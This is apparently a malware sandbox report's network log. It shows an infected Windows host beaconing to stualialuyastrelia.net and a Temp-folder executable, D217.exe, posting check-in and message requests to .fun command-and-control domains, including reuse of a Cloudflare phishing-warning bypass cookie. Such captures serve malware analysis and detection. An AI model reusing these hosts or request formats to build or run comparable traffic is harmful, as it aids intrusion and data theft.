Dec 22, 2023 21:12:36.995625973 CET	283	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jvbeifjbgioqnjdu.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 340 Host: stualialuyastrelia.net
Dec 22, 2023 21:12:37.285187006 CET	261	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:12:37 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 39 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 86 19 c1 5d de fa 09 b4 20 fd 26 4c 17 34 ff 6b 4b 36 d4 00 2a 5f 2e d3 af 87 ed 8d 73 95 64 7e 0b 69 e3 b4 e8 fa 58 6e 96 77 7b b8 da 85 39 bf 06 26 fb 43 9d 0d 0a 30 0d 0a 0d 0a Data Ascii: 49Uys/~(u:R] &L4kK6*_.sd~iXnw{9&C0
Dec 22, 2023 21:12:40.411971092 CET	280	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hfxblklmoixoi.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: stualialuyastrelia.net
Dec 22, 2023 21:12:40.699702024 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:12:40 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Dec 22, 2023 21:12:40.971354961 CET	283	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gvusnnvxbjryhhod.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 310 Host: stualialuyastrelia.net
Dec 22, 2023 21:12:41.257587910 CET	241	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:12:41 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 35 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 1e 87 14 d0 59 9c fe 09 b7 3a e5 3f 57 5b 38 be 65 0b 69 c3 57 3b 0f 7c c3 e2 90 a9 d6 71 8a 63 32 5d 0d 0a 30 0d 0a 0d 0a Data Ascii: 35Uys/~(`:Y:?W[8eiW;\|qc2]0
Dec 22, 2023 21:12:45.787549019 CET	282	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://njmgyjdmvwflpgl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 205 Host: stualialuyastrelia.net
Dec 22, 2023 21:12:46.072729111 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:12:45 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0
Dec 22, 2023 21:12:46.077642918 CET	282	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://reryvuajotrfgrm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 290 Host: stualialuyastrelia.net
Dec 22, 2023 21:12:46.365756989 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:12:46 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 40 5e c3 66 59 c1 d5 0f f5 91 2e c3 29 02 f2 00 b2 90 40 21 e9 3c 1f 09 21 24 db 82 08 f2 f4 c0 10 ff 37 b6 2c da 90 b7 75 eb 02 cf 88 f0 96 0d d7 e7 7f 8c 40 a3 fa db eb 10 27 2e 08 7b 1c b0 d0 cb 00 55 13 33 8a a6 a5 06 02 a8 23 90 de 23 bf 6c 13 d9 c8 e7 9f b9 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e cd 00 79 90 b8 76 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 77 f9 ff 78 4d 57 db c4 0d 13 13 a5 3f e1 92 24 18 4f c5 03 f1 c5 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 aa e3 96 be 21 51 61 ca d1 2f 7c 8a 28 c8 c9 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 2b 87 ea 0e f4 eb 7e 71 eb 90 fa 1a 80 9c 48 d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 47 43 32 27 cc 69 b7 9f 93 bb c2 46 99 48 15 ac af eb d9 55 3d af ba 68 92 5e f1 9d 57 7d 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 07 5a d1 8e 82 11 e8 e4 1f 6c af 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 e4 2a 85 1f d4 0c 66 91 9c 11 06 f1 2c 68 a0 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 d0 e1 8b 8b e1 f2 74 d7 9c ac c3 e0 2b c7 ba bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 a4 b5 44 00 80 e3 1c 68 21 f5 52 48 34 34 96 4d c9 e7 17 3f 4e eb 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 ee b1 e5 bb 8b 54 f3 c3 a7 4c aa ca d4 5f 29 4c 43 9c 51 03 62 18 ae 13 f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 83 e8 c8 ef e5 90 7a 9a e8 23 1e ac f0 2f 70 b3 0e 83 8e 19 13 80 bb 8c f5 80 99 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 cd 43 d9 ad 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 8b 20 a3 7d f0 0f cc 89 f1 b5 e8 c1 d2 27 ab 35 a4 36 06 35 79 fd a8 cd f3 ea 94 09 cb d3 61 1a 9f ad ff cc 43 6f d3 f9 41 ef 9a 0f 3d 0a f5 91 66 df cd a2 cd e2 dc be 04 61 38 62 28 8b e5 37 eb 6e e5 00 5a ce 6f 02 89 45 4d 95 dd Data Ascii: 1f66`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShG@^fY.)@!<!$7,u@'.{U3##l3Ob>!ZC:>yvSSQ{~wxMW?$Oa~i~]DzN,!Qa/\|(kJk?a]V4l3l)\|+~qHO;yLuVW;r#u1yr+LcGC2'iFHU=h^W}U@Wd{9f(B@w=fd3Dw)pKZlNTUo)2([>T~uWf,h[}PmCt+z(Fzk#Dh!RH44M?N~Mpvn%TL_)LCQb@3%}z#/pRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c= }'565yaCoA=fa8b(7nZoEM
Dec 22, 2023 21:12:48.262974024 CET	281	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ubtvbmftovlkfk.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 350 Host: stualialuyastrelia.net
Dec 22, 2023 21:12:48.549412012 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 22 Dec 2023 20:12:48 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	104.21.87.137	80	6844	C:\Users\user\AppData\Local\Temp\D217.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:12:28.723018885 CET	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: neighborhoodfeelsa.fun
Dec 22, 2023 21:12:28.723041058 CET	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 22, 2023 21:12:29.111881018 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:12:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: PHPSESSID=41mtk5eccggkou7o0teboj6rn7; expires=Tue, 16-Apr-2024 13:59:07 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Tue, 20-Feb-2024 20:12:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_use_round=1; expires=Tue, 20-Feb-2024 20:12:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_round_n=2; expires=Tue, 20-Feb-2024 20:12:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NIJOcXbbGEbUha89tRBGRc0xbTuS4N5IPcRtYteuKKlc9UIsGScOPvcSKZ%2BltD3tEmQkH1emwzBbFf6Fqz3M3W1HPX1%2BFE%2FeT0OknPAFVD78IUlQMyvp4Uer9kJkMB2AsmMYLrHZKlCb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0517e Data Raw: Data Ascii:
Dec 22, 2023 21:12:29.111893892 CET	29	IN	Data Raw: 30 33 64 39 66 35 2d 4d 49 41 0d 0a 0d 0a 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: 03d9f5-MIAaerror #D12
Dec 22, 2023 21:12:29.111907005 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49743	104.21.18.224	80	6844	C:\Users\user\AppData\Local\Temp\D217.exe

Timestamp	Bytes transferred	Direction	Data
Dec 22, 2023 21:12:29.375694036 CET	272	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: diagramfiremonkeyowwa.fun
Dec 22, 2023 21:12:29.375722885 CET	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
Dec 22, 2023 21:12:29.529144049 CET	1286	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:12:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vPWDD6Y9qT0c7OpHkgOVB3ek4SFPh50O9%2FYlMnvWKRb7oowN87Vdq43ik3v52mNjsWIzNPfuEvBRBL3TZx0eYQhh1C2kr5TjFk0fQ%2FF4acOmMLpyAhL%2FcgOPGGsp1xVKuLO2RuMkrSGRL3Ls"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b051bf866748b-MIA Data Raw: 31 32 37 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 Data Ascii: 1279<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.error
Dec 22, 2023 21:12:29.529156923 CET	1286	IN	Data Raw: 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e Data Ascii: s.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { wi
Dec 22, 2023 21:12:29.529169083 CET	1286	IN	Data Raw: 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 73 75 63 68 20 61 73 20 70 61 73 73 77 6f 72 64 73 20 61 6e 64 20 63 72 65 64 69 74 20 63 61 72 64 20 64 65 74 61 69 6c 73 20 62 79 20 70 72 65 74 65 6e 64 69 6e 67 20 74 6f 20 62 65 20 61 20 74 72 75 Data Ascii: al information such as passwords and credit card details by pretending to be a trustworthy source.</p> <p> <form action="/cdn-cgi/phish-bypass" method="GET"> <input type="hidden" name="atok" value="B_T
Dec 22, 2023 21:12:29.529234886 CET	1286	IN	Data Raw: 73 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 Data Ascii: sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">839b051bf866748b</strong></span> <span class="cf-footer-
Dec 22, 2023 21:12:29.529248953 CET	155	IN	Data Raw: 65 72 20 2d 2d 3e 0a 0a 0a 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 20 2d 2d 3e 0a 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 23 63 66 2d 77 72 61 70 70 65 72 20 2d 2d 3e 0a 0a 20 20 3c 73 Data Ascii: er --> </div>... /#cf-error-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>
Dec 22, 2023 21:12:29.529258966 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Dec 22, 2023 21:12:29.530442953 CET	356	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=B_T.INJy1.goU0OH_qu8OrpUS5JqQWpKShkcucihfkI-1703275949-0-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 61 Host: diagramfiremonkeyowwa.fun
Dec 22, 2023 21:12:29.530471087 CET	61	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 61 6c 70 61 64 69 6e 26 6a 3d 64 65 66 61 75 6c 74 Data Ascii: act=recive_message&ver=4.0&lid=GhJLkO--seevpalpadin&j=default
